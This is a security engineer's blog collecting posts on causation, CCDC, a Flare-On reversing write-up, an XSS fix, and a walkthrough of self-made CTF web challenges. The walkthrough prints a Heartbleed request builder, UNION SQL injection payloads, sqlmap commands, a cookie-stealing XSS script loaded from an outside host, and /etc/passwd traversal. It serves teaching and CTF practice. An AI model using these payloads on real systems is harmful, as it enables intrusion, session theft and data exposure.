Dave Kukfa Security engineer etc.

Proximate vs. Ultimate Causes

Simple definition from Wikipedia:

A proximate cause is an event which is closest to, or immediately responsible for causing, some observed result. This exists in contrast to a higher-level ultimate cause (or distal cause) which is usually thought of as the “real” reason something occurred. In most situations, an ultimate cause may itself be a proximate cause for a further ultimate cause.

Example from Guns, Germs, and Steel:

Yet another type of explanation lists the immediate factors that enabled Europeans to kill or conquer other peoples—especially European guns, infectious diseases, steel tools, and manufactured products. Such an explanation is on the right track, as those factors demonstrably were directly responsible for European conquests. However, this hypothesis is incomplete, because it still offers only a proximate (first-stage) explanation identifying immediate causes. It invites a search for ultimate causes: why were Europeans, rather than Africans or Native Americans, the ones to end up with guns, the nastiest germs, and steel?

Farnam Street goes into further detail by describing techniques for establishing and mapping ultimate causes.

ISTS 15 Web Challenges

This year, I had the awesome opportunity to serve as the organizer and team lead of the CTF within SPARSA’s annual ISTS competition. This entailed managing a small team of 5 students as we created challenges for each of the 5 CTF categories (Web, Reversing, Crypto, Forensics, and Misc). Besides gaining experience managing a team for the first time and planning and executing a project from conception to completion, I was also able to sharpen my technical skills by creating challenges.

I was in charge of the web category this year, and created 5 challenges ranging from beginner to advanced. This post walks through each of them and explains the intended path a player would take to arrive at the solution.


Web 100 (titled Layers) starts us off by presenting the user with a quote from the 2001 DreamWorks classic, Shrek.

Shrek quote

Inspecting the page’s source reveals a series of layered divs, with a different background image for each.

Series of divs in browser dev tools

To reach the flag, the user can ‘peel back’ each layer by removing it from the DOM using the browser’s dev tools.

Removing layers of divs

Reaching the bottommost image (nineteen) reveals the flag in the form of an animated GIF.

Animated GIF flag


The next challenge provides an HTTPS link to a surgical center with some… interesting procedures.

Bleeding Heart Surgical Center

Poking around the site reveals tons of sketchy medical procedures and questionable ethics, but little in terms of functionality or dynamic content.

Would you trust them?

Hint: The “Not secure” warning next to the address bar is telling the truth. The vulnerability lies in the web server’s OpenSSL library – the server is vulnerable to Heartbleed. This can be verified using a tool like nmap:

nmap scan reveals Heartbleed vulnerability

To exploit the bug, launch a simple PoC script against the target. I used this GitHub gist and got the flag in the memory dump:

Flag in Heartbleed memory dump
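For the curious, the malicious record a Heartbleed PoC sends is tiny. Here’s a minimal Python sketch of how one might build it (this assumes TLS 1.1 and omits the handshake a full PoC has to perform first):

```python
import struct

def heartbeat_record(claimed_len=0x4000, tls_version=0x0302):
    # Heartbeat body: type 1 (request) plus a payload length we are lying about.
    # No payload actually follows, so a vulnerable server echoes back up to
    # claimed_len bytes of whatever happens to sit in its memory.
    body = struct.pack('>BH', 1, claimed_len)
    # TLS record header: content type 24 (heartbeat), version, body length.
    return struct.pack('>BHH', 24, tls_version, len(body)) + body

print(heartbeat_record().hex())  # 1803020003014000
```

A vulnerable server replies with up to claimed_len bytes of process memory, which is exactly where the flag turned up in the dump above.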


Web 300 cuts right to the chase – the user is instantly greeted with a form with a bunch of inputs on a PHP endpoint.

Web 300 homepage

Submitting the form displays a horoscope that changes according to the user’s birth date.

Our endearing horoscope

After poking at this for a while, one might think to try a SQL injection attack (shown below in Burp Suite Repeater). However, we quickly discover the application’s defenses don’t like that:

No funny business!

These defenses seem to hold true for both the day and year fields. Messing with the month is also frowned upon:

Still no funny business!

However, when we leave the original month name intact, but add some SQL injection probes after it, we get a different response.

Funny business!

Hmm… let’s try a basic ' or 1=1;# payload.

No dice

Looks like that doesn’t get us very far. Maybe they’re not using single quotes? Let’s try it again, but with double quotes this time:


We got a response this time! It looks like the double quotes did it. So now we definitely know this is SQL injectable, and we need to try to extract the flag from it.

Let’s try to enumerate the tables within the database with this handy SQL line from PentestMonkey:

" union select table_schema,table_name from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema';#

Command failed

But alas, it appears this didn’t work. If we look back at the normal output of the web app, we see the horoscope is the only thing being visibly returned from the database. Aha! Maybe the backend SQL code is only selecting a single column, where our injection is trying to select two? Let’s try it again, but concatenate the table_schema and table_name this time:

" union select concat(concat(table_schema, '.'), table_name) from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema';#

We got a response!

Sweet, that got us a response at least! So we fixed the columns, but we’re still not getting the data we want – the horoscope is still being returned. What could be the problem this time?

Let’s take another look at our injection. We’re using union to combine the results from two select statements: one from the original backend SQL code, and one that we’re injecting to pull the table names. These results are lumped into one large return set with multiple rows, and the database is simply returning the first row, which is the horoscope.

To get around this, we can use SQL’s limit and offset statements to select the exact row we want. Let’s try grabbing the next row:

" union select concat(concat(table_schema, '.'), table_name) from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' limit 1 offset 1;#

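As an aside, the column-count requirement and the LIMIT/OFFSET row selection are easy to reproduce locally with SQLite (a sketch; the real backend is MySQL, and these table names are invented):

```python
import sqlite3

# Local model of the backend; table and column names are guesses for illustration.
db = sqlite3.connect(':memory:')
db.executescript("""
    CREATE TABLE horoscopes (sign TEXT, text TEXT);
    INSERT INTO horoscopes VALUES ('Capricorn', 'Expect SQL in your future.');
    CREATE TABLE secrets (name TEXT, value TEXT);
    INSERT INTO secrets VALUES ('flag', 'not_the_real_flag');
""")

query = "SELECT text FROM horoscopes WHERE sign = 'Capricorn'"

# A UNION whose right-hand SELECT has a different column count fails outright...
try:
    db.execute(query + " UNION SELECT name, value FROM secrets")
except sqlite3.OperationalError as err:
    print(err)

# ...so the injected SELECT must produce exactly one column (hence the concat),
# and LIMIT/OFFSET then picks which row of the combined result comes back.
# (SQLite concatenates with ||; MySQL uses concat(). ORDER BY 1 is added here
# only to make this local demo deterministic.)
row = db.execute(query + " UNION SELECT name || '.' || value FROM secrets"
                 " ORDER BY 1 LIMIT 1 OFFSET 1").fetchone()
print(row[0])  # flag.not_the_real_flag
```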

Now we’re cooking with gas! This looks like the table containing our flag. Let’s take a look inside and list out the table’s columns with the following injection:

" union select column_name from information_schema.columns where table_schema = 'horoscopes' and table_name = 'flags' limit 1 offset 1;#

A column named flag

A column named flag… this has gotta be it! Let’s dump the flag column:

" union select flag from horoscopes.flags limit 1 offset 1;#


Huh?! This doesn’t look like our flag format… let’s try one more?

This is odd...

This can’t be right… let’s see what other columns exist within the flags table?


A description! This might help us understand what’s going on here. Let’s see what’s inside description:


A description of the Australian flag?!? You can’t mean… AGH! We’ve been duped!! Foiled!

So it looks like this was a fake table designed to throw us off. Thankfully, we can return to an earlier injection and keep looking for tables within the database:

" union select concat(concat(table_schema, '.'), table_name) from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' limit 1 offset 2;#


This looks like the database our horoscopes are pulled from. Let’s try one more:


Aha! This looks fruitful! Let’s take a look at the columns:


An id… not of much use. Anything else?


Just what the doctor ordered. Let’s get this over with, shall we?

Our flag!

Note that it is possible to complete this challenge with SQLmap, but it’s intentionally designed to be difficult to do so. The SQLmap command to pull the private database is:

sqlmap --data='month=January&day=1&year=1999' --level=5 -u --threads=4 -D private --dump

The process of deriving that command is left as an exercise for the reader.


Our next challenge prompts us to get in touch with King Girugamesh via Facebook Messenger. We shoot him a message, and he explains himself a bit (keep in mind the Civilization theme of the competition) and asks us to provide him with a link on the challenge website.

Girugamesh conversation

The challenge website has a large map that the user can interact with. Clicking a country passes the country’s ID as a query parameter, which loads the country’s name on the page.

Challenge website

Country loaded

There’s also a login link on top, and we can see that Girugamesh is currently logged in. Browsing to the login page loads a simple username/password form.

Login form

Trying some basic SQL injection doesn’t seem to get us anything. We can even fire SQLmap at the login endpoint, and it comes up empty.

sqlmap --data 'username=test&password=test' --level=5 -u --threads=4

SQLmap error

So now what? Let’s go back to our homepage for now. After poking around a bit, we discover that inputting an alphabetical country ID generates an error message on the map:

Map error message

That looks like user input being reflected back on the page! Perhaps this is vulnerable to XSS?

XSS payload works

Looks like it is! But what value does XSS have to us? We’re trying to attack the server, not a user, right?

Let’s revisit what we know so far. Girugamesh asked us for a link to the challenge website, and he’s currently logged in… maybe we can leverage the XSS to steal his cookie and access the web app!

To help us accomplish this, we can use XSSHunter to generate a payload that will report a ton of information back to us whenever the XSS fires, including the victim’s cookies. Our new XSSHunter payload is:

<script src=https://dave.xss.ht></script>

Let’s send that over to Girugamesh!

Looks like he doesn't like it

Hmm… looks like he knows something’s fishy here. We’ll need to find a way to make the link less suspicious so Girugamesh will click it. He said something about the ID having words… maybe we can URL-encode it to get rid of them? After URL-encoding, our new payload is:

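One way to build such a link is to percent-encode every byte of the payload, so no readable words survive (a sketch; the exact encoded payload isn’t reproduced here):

```python
payload = '<script src=https://dave.xss.ht></script>'
# Percent-encode every byte so no readable words remain in the link.
encoded = ''.join('%{:02X}'.format(b) for b in payload.encode())
print(encoded)
```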
Girugamesh happily clicks our link now, and the XSS payload fires! We can use the generated XSSHunter report to view information gathered from the attack, including his session cookie.

He clicked it!

Our XSSHunter report reveals a cookie named flag with the value ... ..-. ..- --.. ..- - ...- -- ... - -. --.. ..- ..-. .-. .--- ..- -.-- -.-- ..- -.- .--. Is that… Morse code? Whatever, let’s load it into our browser and see what the logged-in version of the page looks like.


All we get is a welcome message and a cheeky YouTube video. Perhaps the flag is within the Morse code itself? Running the cookie through a Morse code translator reveals the string SFUZUTVMSTNZUFRJUYYUKP, but this value is rejected when we try to enter it as a flag. There must be something else going on here!

Remember our login page? Maybe there’s something there that can indicate how our cookie is generated. Taking a look at the login page source reveals a client-side algorithm that ‘hashes’ the password, replaces the password field’s value with the result, and sends that to the server.

function hash_password(pwField) {
	hash = pwField.value.toLowerCase().split('');

	caesarian_shift(hash, 13);
	rotate_right(hash, 37);
	swap_chars(hash, 'g', 'i');
	swap_chars(hash, 'r', 'u');
	swap_chars(hash, 'g', 'a');
	swap_chars(hash, 'm', 'e');
	swap_chars(hash, 's', 'h');
	hash = morse_code(hash);

	pwField.value = hash.join(' ').replace(/ +/g, ' ');
}

To get the original password (and the flag), it looks like we’ll have to work backwards through this function, undoing each step in reverse order (each swap_chars call swaps both letters, so it’s undone by swapping the same pair again):

  1. Translate the Morse code
  2. Swap all S’s and H’s
  3. Swap all M’s and E’s
  4. Swap all G’s and A’s
  5. Swap all R’s and U’s
  6. Swap all G’s and I’s
  7. Left-rotate the array 37 times
  8. Finally, perform a Caesarian shift with a key of 13 (ROT13 is its own inverse)

Reversing the algorithm reveals the original password WELLEXCUSEMEGIRUGAMESH. Entering this as our flag solves the challenge and takes us to the final round!
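The whole reversal fits in a few lines of Python (a sketch; note that each swap_chars step is treated as a two-way swap and undone by swapping the same pair again, in reverse order):

```python
# Morse table for undoing the final morse_code step.
MORSE = {'.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', '.': 'E', '..-.': 'F',
         '--.': 'G', '....': 'H', '..': 'I', '.---': 'J', '-.-': 'K', '.-..': 'L',
         '--': 'M', '-.': 'N', '---': 'O', '.--.': 'P', '--.-': 'Q', '.-.': 'R',
         '...': 'S', '-': 'T', '..-': 'U', '...-': 'V', '.--': 'W', '-..-': 'X',
         '-.--': 'Y', '--..': 'Z'}

def unhash(cookie):
    chars = [MORSE[sym] for sym in cookie.split()]            # undo morse_code
    for a, b in [('S', 'H'), ('M', 'E'), ('G', 'A'), ('R', 'U'), ('G', 'I')]:
        chars = [b if c == a else a if c == b else c for c in chars]  # undo swaps
    n = 37 % len(chars)
    chars = chars[n:] + chars[:n]                             # undo rotate_right 37
    return ''.join(chr((ord(c) - 65 + 13) % 26 + 65) for c in chars)  # undo ROT13

cookie = ('... ..-. ..- --.. ..- - ...- -- ... - -. --.. '
          '..- ..-. .-. .--- ..- -.-- -.-- ..- -.- .--.')
print(unhash(cookie))  # WELLEXCUSEMEGIRUGAMESH
```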


The final challenge brings us to an eccentrically-designed gym website, complete with flaming text and rippling biceps.

House of Curl

The page’s source code is pretty bare – it appears to be a simple static page. To verify, we can try requesting the index page to confirm its file type. Let’s try .html, .htm, and .php for good measure:



No dice so far…

PHP works

.php did it! Now we know the site is dynamic – there could be some server-side PHP code that checks some aspect of our request, and returns different pages depending on that aspect. After all, that message on the site seems pretty suspicious. Perhaps we need to provide the ‘magic words’?

Let’s take another look at the site. Given the name of the gym and the pictures on the page, they seem to focus pretty heavily on bicep curls. In fact, that’s the only exercise on the entire website. Hmm, a web challenge with bicep curls… could they be referring to cURL, the command-line tool?

Let’s find out! When requesting the page with cURL, we get the following result:


Bingo! Requesting with cURL gives us a completely different output. Looks like Gilgamesh is trying to sell the stuff he stole from Girugamesh in the previous challenge. Let’s check out these goods he’s selling:

Goods image gallery

We’re greeted by an image gallery of the miscellaneous items and services that constitute the latest ‘Girugamesh loot’. Looking at the page source, something peculiar jumps out at us:

Funky image retrieval

All the images are retrieved dynamically from a PHP endpoint! It looks like we can specify the location of the image we want, and provide some sort of an access token as well.

Are you thinking what I’m thinking? Let’s try to request something other than an image using a directory traversal attack! We can start with the classic /etc/passwd payload, and use the same access token as the images on the page:

Not happening

Hmm, it looks like there are some protections in place. The application must somehow detect that /etc/passwd isn’t an image. If we look at the images on the page, all of their file paths begin with the images directory. Maybe if we start our directory traversal from images, we can evade the application’s image checks?

Invalid access token

Sweet, we got some different output this time! Now it looks like our access token is the problem. The same token used for most of the images on the page doesn’t seem to work for accessing /etc/passwd.

To understand what’s going on, let’s revisit the original access tokens on the page. The token ffd8ffe0 is used for almost all of the images, with the exception of ffd8ffe1. These characters are all within the range of valid hexadecimal numbers. Maybe our access token is a certain 4-byte value in hex? Throwing our access token in a hex editor converts it to four random Unicode characters, which isn’t too helpful:

Random characters

At this point we’re pretty stumped. Let’s try throwing the access code into Google to see what comes up:

File signatures

It looks like this is the file signature for JPEG images. Some more quick searching reveals ffd8ffe1 is an alternative file signature for JPEGs with EXIF data. Could our access token simply be the file signature of the file we’re requesting?

To test this, let’s download two images from the page: sub.JPG with access token ffd8ffe0, and mantle.jpg with access token ffd8ffe1. Loading them into a hex editor, we see sub.JPG indeed begins with bytes FF D8 FF E0, and mantle.jpg begins with FF D8 FF E1.



Cool, so it looks like our hypothesis is correct! To access a file, we need to know its first 4 bytes. So for /etc/passwd, what would they be?

root account

/etc/passwd usually starts with the root account, which occupies the first 4 bytes. Typing root in our hex editor reveals the bytes 72 6F 6F 74. Let’s try that as our access token:
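In other words, a sketch of the hypothesis:

```python
# Hypothesis: the access token is the hex of the target file's first four bytes.
def access_token(first_bytes):
    return first_bytes[:4].hex()

print(access_token(b'\xff\xd8\xff\xe0' + b'...rest of a JPEG'))  # ffd8ffe0
print(access_token(b'root:x:0:0:root:/root:/bin/bash'))          # 726f6f74
```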


Awesome, that worked! So we know how to access arbitrary files on the web server, now we just need to find and pull the flag. However, this is easier said than done: the flag could be anywhere in the filesystem, and we don’t have much indication of where to look.

To get a better idea of where to start, let’s request the PHP file itself so we can see its code. We’ll start in the images folder and traverse upward to access viewimage.php. Now we just need to guess the access code.

Similar to the /etc/passwd file, most PHP files start with a predictable 4 bytes. When the PHP interpreter parses a file, it looks for PHP opening and closing tags (<?php and ?>) to know when to start and stop interpreting PHP code. Conveniently for us, this opening tag is usually located directly at the beginning of PHP files. Thus, our access code would be <?ph, or 3C 3F 70 68 in hex. Let’s give it a try:

Blank page

What?! Nothing at all? No error message, even?

Source code

Phew, false alarm. It doesn’t look like there’s any information about the flag within the PHP code, but there’s a comment with a link to a blog post on yet another site. Let’s see what’s on that page:

Blog post

Interesting… it looks like this is where Gilgamesh brags about his latest engineering ‘accomplishments’. Another post on the site hints about his upcoming payment processing system that has yet to be released:

duMass Payment Processor

From this post, we can gather that the payment processor is written in PHP and the code is ready to be released. At the bottom of the blog, Gilgamesh links to some communities he’s a member of, all of which are for WordPress plugin development:

WordPress Plugin Developers

This new payment processor may very well be a WordPress plugin. Let’s check the plugin directory of his blog:

duMass directory

Aha! Just what we’re looking for. Let’s take a look inside:

duMass files

An HTML and a PHP file. Browsing to the PHP file triggers some sort of anti-tamper protection:

Tampering detected!

To understand how this PHP endpoint is used, let’s look at the HTML file:

HTML form

Looks like a form that users submit when they want to purchase something. Filling it out and submitting it returns the following message from process-payment.php:

How rude!

Well that was rude! At least the anti-tamper protection wasn’t triggered. And it looks like we’re on a different IP now! Wait, is that the same IP from the Girugamap challenge? Let’s take another look at that form:

HTML source

What’s this?! It looks like the form’s POST endpoint has been replaced. No way… Girugamesh backdoored the payment processor by redirecting the form to his site!! His endpoint is pretty rude though. I wonder what the original endpoint does?

The PHP file didn’t like it when it was requested directly, but Girugamesh’s seemed to run fine when we submitted data to it through the HTML form. To replicate this, we can use Chrome’s Developer Tools to replace the backdoored endpoint with the original:

Replaced with original endpoint

Now let’s submit the form and see what happens:

A nicer message

Ah, this is much friendlier. But still not very helpful! Wait a second, our open Developer Tools window caught something:

The flag!

Finally, we get the flag! Thus concludes this year’s web challenges. Hopefully Gilgamesh learned his lesson!

My Experiences Competing in CCDC

The Collegiate Cyber Defense Competition (CCDC) is often mentioned in discussions about security education. Specifically, there’s been a good amount of debate on the value of the competition and what students learn by participating. After competing at NCCDC this past weekend and wrapping up my final CCDC season, I’d like to share some thoughts I have about the competition and its value in education and the security community. Please note that this post represents my thoughts and opinions as an individual, and not necessarily those of my team or institution.

Initial Attraction

At the beginning of my Junior year in the CSEC program at RIT, I had gotten my feet wet learning about information security, and I wanted to dive into the forefront of the security community and quickly climb the learning curve of security education. I was learning about web and systems security through various online resources, and wanted to exercise those skills in a competitive environment to test myself and learn from others.

My school competes in CCDC and is a regular contender at the national competition, so when tryouts came around, I applied for a web security role within the team. Soon after, I joined the team specializing in web security and took on the additional role of managing injects (business tasks assigned to teams during the competition). This allowed me to leverage and build upon my soft skills as well as my technical skills.


Practicing for and competing in CCDC over the coming months taught me a great deal about OS internals and how systems interact with one another. I became comfortable operating in both Windows and Linux environments, and learned to dig deep into either system to hunt for red team malware and rootkits. I also learned to backtrace red team attacks to identify and remediate the root causes of compromise.

Competing in CCDC allowed me the opportunity to meet tons of great people in the security space who are involved in the competition – everyone from red teamers to white teamers to other students. After each competition, the red teamers do an individual debrief with each team to address what the team did well and what they could improve on. This is paramount for learning from the competition and improving for future iterations.

Many internships and full-time jobs are found through CCDC competitions. Participating in CCDC is a great way to demonstrate your interest in and dedication to security, which is noticed by sponsors and red teamers looking to expand their teams and hire passionate students.


Many of the complaints raised against CCDC address how the competition is run in a vacuum of sorts. By this, I mean that competitors often need to ‘game the game’ and do things you would never see or do in practice. Winning teams usually end up employing crazy strategies or tactics that are hardly viable in the real world. For example, I’ve heard of teams using embedded devices such as phones or printers as firewalls, and scripting snapshot restores on virtualized systems to avoid red team persistence but just barely pass scoring checks. Teams may also resort to disabling core components or functionality of the operating system in order to reduce attack surface. These strategies are creative and clever, but where do these skills transfer to real-world scenarios and environments?

Historically, the networks that competitors are tasked to defend can contain systems or technologies that are woefully out of date – sometimes being EOL’d more than a decade ago. While these may be present in some networks in reality, it would be more beneficial to learn to use and defend modern systems and technologies rather than legacy systems of yesteryear.

The Northeast region (NECCDC) is doing a great job at changing this. This year’s regional competition featured a modern network (including development and production clouds complete with load balancers) as well as modern technologies (GitLab, Foreman, and Jenkins). These types of topologies are much more likely to be encountered in the real world, and training and competing within updated infrastructures will better prepare students for things they’ll see on the job.

Is it worth it?

After my first year, I continued to participate in CCDC. This was largely to continue improving my technical skills (OS internals, malware hunting) and my soft skills (teamwork, management, writing). However, I believe there’s a point of diminishing returns for participating in CCDC. After reaching this point, students will only get better at competing in CCDC with little transfer of skills or expertise to the real world. The length of time it takes to reach this point will differ between students, but I do believe it exists whether it takes 4 years or a single season.

Bottom line

CCDC has taught me a lot, and I’m thankful for the opportunities it’s provided me over the years. Overall, I can conclude that participating in CCDC yields a lot of learning and experience, but there’s a point of diminishing returns where these rewards lessen year by year. Students should evaluate whether the competition is worth it for them with respect to the nature of the competition and their prospective career path.

2016 Flare-On Challenge Write-Up

I had a chance to test my reverse engineering skills in FireEye’s Flare-On challenge this year. While I didn’t get very far, I was still able to learn a ton and sharpen my skills for next year. All of the challenges are available on the Flare-On website, so feel free to follow along. With that said, let’s jump over that function call into the solutions!

Challenge 1

Starting off, we’re given a challenge1.exe binary. Running the binary will prompt the user for a password:

Incorrect password

Let’s take a closer look at the binary. Loading the challenge into Binary Ninja, we can quickly locate the strings used when comparing the passwords:

Comparison strings

Looking at the cross-references to the “Enter password” string, we can jump to the password comparison function. Near the comparison itself, the string “x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q” is pushed to the stack.

Pushing string to stack

This looks fruitful! Let’s try entering this as the password:


Dang, no dice! Let’s use a debugger to see what’s actually being compared. By setting a breakpoint on the function called just before the comparison, then entering the password “test”, we see the string “aDSwaZ==” is passed to the function instead of our original input.

Debugger view

The double equals sign on the end of the string is a dead giveaway for a base64-encoded string. It looks like the program is base64-encoding our input, then comparing it to the comparison string (x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q). If we base64-decode the comparison string, we’ll know the correct input to enter. Using a base64 decoder, let’s see what our comparison value decodes to:

Decoded gobbledegook

Huh, that doesn’t look right. There are a lot of bytes outside the ASCII range. It looks like there’s something fishy going on here…

To understand what’s going on, I needed to do a bit of research about base64. I was looking at an example implementation of a base64 algorithm when I saw the following line of code:

private static final String CODES = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

This looks like an alphabet that’s designed to be easily changed. Curious, I scrolled up on the page and found the following information:

The particular set of 64 characters chosen to represent the 64 place-values for the base varies between implementations. The general strategy is to choose 64 characters that are both members of a subset common to most encodings, and also printable.

So it looks like this alphabet is changeable! Going back to the strings in the binary, we can quickly identify a 64-character value that looks like another alphabet:

Alternative base64 alphabet

A quick Google search reveals a tool that can perform base64 encodings with alternative alphabets for us. Entering the custom alphabet we just found and our comparison string returns “[email protected]” as output. This looks like our flag! Let’s give it a try:


Sweet! Entering the password on the Flare-On website moves us on to the next challenge.
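Decoding with a custom alphabet is also easy to script yourself. A Python sketch (using a made-up rotated alphabet for the demo, since the binary’s real alphabet isn’t reproduced here):

```python
import base64

STD = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

def b64decode_custom(data, alphabet):
    # Map the custom alphabet back onto the standard one, then decode normally.
    return base64.b64decode(data.translate(str.maketrans(alphabet, STD)))

# Demo with an invented alphabet (STD rotated by one position).
custom = STD[1:] + STD[:1]
encoded = base64.b64encode(b'flare').decode().translate(str.maketrans(STD, custom))
print(b64decode_custom(encoded, custom))  # b'flare'
```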

Challenge 2

The next challenge is aptly named DudeLocker.exe, with an included BusinessPapers.doc that appears to be encrypted. Upon inspecting the binary in Binja, we can see there are several initial checks that must be passed.

The first of which involves a call to SHGetFolderPath, which retrieves the paths of special system folders and returns 0 if the operation was successful.

Call to SHGetFolderPath

The 2nd parameter being passed to SHGetFolderPath (the 4th value pushed to the stack), 0x10, is a CSIDL value identifying the folder being retrieved. A quick lookup reveals CSIDL 0x10 corresponds to the user’s desktop directory. So, this call will attempt to grab the path of the desktop, and the program will continue if the operation was successful.

The next block checks if the length of our retrieved desktop path is less than or equal to 0xf8, or 248 in decimal. If so, the program continues; otherwise, it returns.

Checking desktop path length

Afterwards, we see a block with a call to CreateFile at the end. CreateFile, according to MSDN, “creates or opens a file or I/O device”. Despite its name, the I/O devices it works with are not limited to files; it also works with file streams, directories, physical disks, volumes, etc. The function takes the name of the I/O device as a parameter (the last value pushed to the stack), followed by 6 additional parameters describing the device’s attributes.

Showing call to CreateFile

The filename parameter (var_244) is constructed earlier in the block. We see it’s being passed to sub_401000 along with var_44c, which contains our desktop path from earlier, and var_3c, which contains the string “Briefcase”. The subroutine will concatenate “\Briefcase” to our desktop path, which is then used in the CreateFile call.

So CreateFile will attempt to open an I/O device located on our desktop named Briefcase. For more information, let’s take a look at the additional parameters. dwDesiredAccess is set to 0x80000000 (GENERIC_READ), dwShareMode is set to 0x1 (FILE_SHARE_READ), lpSecurityAttributes is set to 0, dwCreationDisposition is set to 0x3 (OPEN_EXISTING), and dwFlagsAndAttributes is set to 0x02000000 (FILE_FLAG_BACKUP_SEMANTICS). There’s an important note alongside FILE_FLAG_BACKUP_SEMANTICS: “You must set this flag to obtain a handle to a directory.”

It looks like CreateFile is attempting to open an existing directory named Briefcase located on our desktop. If this operation fails, an error code of 0xffffffff is returned (INVALID_HANDLE_VALUE), which will print a taunting message and exit the program. Otherwise, we proceed onwards.

The next check lands us in a subroutine that calls GetVolumeInformation to retrieve the serial number of our root (C:) volume. This was deduced by tracing the parameters as we just did above, which is left as an exercise to the reader. The serial number is compared to the value 0x7dab1d35 (“The Dude Abides”) – if they aren’t equal, eax is cleared; otherwise, eax remains.

Block comparing serial number

We need eax != 0 to pass this check, so we’ll have to either change our C volume’s serial number or bypass this check with a debugger. I opted to use the handy VolumeID from Sysinternals to change the volume’s serial. (Did I mention it’s important to work on these in a VM?)

Let’s try running the binary at this point. We’re greeted with a ransom note in the briefcase that rudely replaced my desktop background:

Ransom note

Looks like they want a million Bitcoins. Maybe those business papers will suffice? Let’s drop BusinessPapers.doc in the Briefcase aaaaand…

BusinessPapers still encrypted

Dang, still encrypted. However, the Last Modified date on the file changed, so DudeLocker must have done something with it. Taking another look at the binary reveals calls to CryptEncrypt in the program’s Import Address Table:

CryptEncrypt in IAT

This makes sense, since our modified BusinessPapers.doc still appears to be encrypted. However, the IAT doesn’t seem to have any entries for a decryption function. Taking a look at CryptEncrypt quickly points us to CryptDecrypt, which uses the same arguments sans dwBufLen at the end. If we could patch the call to CryptEncrypt with a call to CryptDecrypt, we might be able to decrypt the contents of the BusinessPapers!

Let’s take another look at the IAT. The entry for CryptEncrypt is 0x24fa, which refers to an offset in the DudeLocker binary. If we add that to the image base of 0x400000, we get 0x4024fa. Inspecting the binary at 0x4024fa reveals the following:

Binary contents at 0x4024fa

Hmm, looks like there’s another offset (0x00ba) followed by “CryptEncrypt” in ASCII. To make sense of what we’re looking at, I loaded the Windows DLL containing CryptEncrypt (advapi32.dll) in Dependency Walker and found the exported CryptEncrypt function:

Dependency Walker output for CryptEncrypt

Aha! It looks like 0x00ba was referring to the function’s hint, which contains the index for that function in the DLL’s export table. The hint for CryptDecrypt is 0x00b4. Are you thinking what I’m thinking??

Patching the binary IAT

Well, you are now. Patching the IAT allowed us to decrypt the file instead of encrypting it! The file still doesn’t look like a DOC file, but if we open it in a hex editor, we see the initial bytes FF D8 FF E0. A quick Google search reveals that’s the file signature for a JPEG image. Changing the file type from .doc to .jpg reveals our flag:

Victory at last!

XSS on a Document Converter

When I was switching my blog to Jekyll, I needed to convert a few long Word docs to Markdown, one of which was the Web Application Cheat Sheet. Being about web security, the document contained many XSS payloads and other nastiness. It also had a lot of nested bullet points, which would have made conversion by hand a pain. So, I found a promising conversion app called word-to-markdown, dropped in the Word doc, and lo and behold…

Reflected XSS alert

Great, should have seen this coming.

It turned out the site was treating the document’s contents as HTML, and thus rendering the content on the right side of the page without HTML-encoding it. This opened up a reflected XSS vulnerability – not very practical to exploit, but bad nonetheless. Thankfully, the source code was available on GitHub and the developer was very receptive to contributions. I made some quick changes, and after a simple fork and pull request the updated version went live.

The fix was pretty simple – since most people wouldn’t write HTML in a Word doc and expect it to be rendered as such, I HTML-encoded the Markdown after conversion so the document’s contents would show up as regular text and not HTML. Here’s how XSS payloads are rendered now:
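The idea, sketched in Python (the app itself is written in Ruby, so this is purely illustrative):

```python
import html

# Converted Markdown that happens to contain markup from the source document.
converted = 'See <script>alert(1)</script> for details'
# Escape the output so markup displays as text instead of executing in the browser.
safe = html.escape(converted)
print(safe)  # See &lt;script&gt;alert(1)&lt;/script&gt; for details
```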

HTML-encoded XSS payload